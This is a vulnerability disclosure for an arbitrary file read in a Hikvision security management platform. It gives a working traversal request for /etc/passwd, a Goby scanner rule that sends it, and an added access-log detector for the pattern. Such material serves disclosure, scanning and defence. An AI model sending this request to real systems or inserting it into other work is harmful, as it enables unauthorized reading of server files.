Vulnerable parameter: fileName
Vulnerability details:
1. Open your own service.
2. Access it with the following request:
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Te: trailers
Connection: close
3. The check confirms that the vulnerability is present.
Goby detection rule script:
package exploits

import (
	"git.gobies.org/goby/goscanner/goutils"
)

func init() {
	// expJson is the Goby rule definition. ScanSteps requests the download
	// endpoint and reports a hit when the response is 200 and contains "root:".
	// The inner quotes of FofaQuery/GobyQuery are escaped so the JSON parses.
	expJson := `{
  "Name": "海康综合管理平台 readfile",
  "Description": "",
  "Product": "",
  "Homepage": "",
  "DisclosureDate": "2024-05-31",
  "PostTime": "2024-05-31",
  "Author": "[email protected]",
  "FofaQuery": "title=\"综合安防管理平台\"",
  "GobyQuery": "title=\"综合安防管理平台\"",
  "Level": "3",
  "Impact": "",
  "Recommendation": "",
  "References": [],
  "Is0day": false,
  "HasExp": false,
  "ExpParams": [],
  "ExpTips": {
    "Type": "",
    "Content": ""
  },
  "ScanSteps": [
    "AND",
    {
      "Request": {
        "method": "GET",
        "uri": "/center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd",
        "follow_redirect": true,
        "header": {
          "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36",
          "Accept-Encoding": "gzip, deflate",
          "Accept": "*/*",
          "Connection": "keep-alive"
        },
        "data_type": "text",
        "data": ""
      },
      "ResponseTest": {
        "type": "group",
        "operation": "AND",
        "checks": [
          {
            "type": "item",
            "variable": "$code",
            "operation": "==",
            "value": "200",
            "bz": ""
          },
          {
            "type": "item",
            "variable": "$body",
            "operation": "contains",
            "value": "root:",
            "bz": ""
          }
        ]
      },
      "SetVariable": []
    }
  ],
  "ExploitSteps": [
    "AND",
    {
      "Request": {
        "method": "GET",
        "uri": "/test.php",
        "follow_redirect": true,
        "header": {},
        "data_type": "text",
        "data": ""
      },
      "ResponseTest": {
        "type": "group",
        "operation": "AND",
        "checks": [
          {
            "type": "item",
            "variable": "$code",
            "operation": "==",
            "value": "200",
            "bz": ""
          },
          {
            "type": "item",
            "variable": "$body",
            "operation": "contains",
            "value": "test",
            "bz": ""
          }
        ]
      },
      "SetVariable": []
    }
  ],
  "Tags": [],
  "VulType": [],
  "CVEIDs": [
    ""
  ],
  "CVSSScore": "",
  "Translation": {
    "CN": {
      "Name": "海康综合管理平台 readfile",
      "Product": "",
      "Description": "",
      "Recommendation": "",
      "Impact": "",
      "VulType": [],
      "Tags": []
    },
    "EN": {
      "Name": "海康综合管理平台 readfile",
      "Product": "",
      "Description": "",
      "Recommendation": "",
      "Impact": "",
      "VulType": [],
      "Tags": []
    }
  },
  "PocGlobalParams": {},
  "ExpGlobalParams": {}
}`

	// Register the rule with Goby under this file's name.
	ExpManager.AddExploit(NewExploit(
		goutils.GetFileName(),
		expJson,
		nil,
		nil,
	))
}
Originally published on the WeChat official account 小羊安全屋: [Arbitrary File Read] Hikvision Integrated Security Management Platform
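A defender-side counterpart to the Goby rule above, added here as an example and not part of the original post: an access-log check that flags the request shape from step 2 (a `..;` path segment, or a `fileName` value containing a `..` element). It also normalizes percent-encoded forms, which goes beyond the literal request on the page. It assumes logs in common/combined log format; the sample lines, the `/download` path and the function names are constructed for illustration.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// Constructed sample access log (combined format); only line 1 uses the page's URI.
const sampleLog = `10.0.0.5 - - [31/May/2024:10:00:01 +0800] "GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1" 200 1843
10.0.0.8 - - [31/May/2024:10:00:02 +0800] "GET /download?fileName=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1843
10.0.0.9 - - [31/May/2024:10:00:03 +0800] "GET /download?fileName=report..2024.xlsx HTTP/1.1" 200 20480`

// decodeFully percent-decodes until stable (each pass shortens s, so it terminates).
func decodeFully(s string) string {
	for d, err := url.PathUnescape(s); err == nil && d != s; d, err = url.PathUnescape(s) {
		s = d
	}
	return s
}

// Suspicious flags a "..;" or ".." path segment, or a ".." element in fileName.
func Suspicious(target string) bool {
	path, query, _ := strings.Cut(target, "?")
	if p := decodeFully(path) + "/"; strings.Contains(p, "/..;") || strings.Contains(p, "/../") {
		return true
	}
	for _, pair := range strings.Split(query, "&") {
		k, v, _ := strings.Cut(pair, "=")
		v = "/" + strings.ReplaceAll(decodeFully(v), `\`, "/") + "/"
		if strings.EqualFold(k, "fileName") && strings.Contains(v, "/../") {
			return true
		}
	}
	return false
}

// ScanLog returns the flagged lines of an access log.
// Assumes common/combined log format, where field 7 is the request target.
func ScanLog(log string) (hits []string) {
	for _, line := range strings.Split(log, "\n") {
		if f := strings.Fields(line); len(f) > 6 && Suspicious(f[6]) {
			hits = append(hits, line)
		}
	}
	return hits
}

func main() { fmt.Println(strings.Join(ScanLog(sampleLog), "\n")) }
```

The third sample line is not flagged because `..` inside a file name is not a path element; a hit combined with a 200 status on the download endpoint is what warrants follow-up.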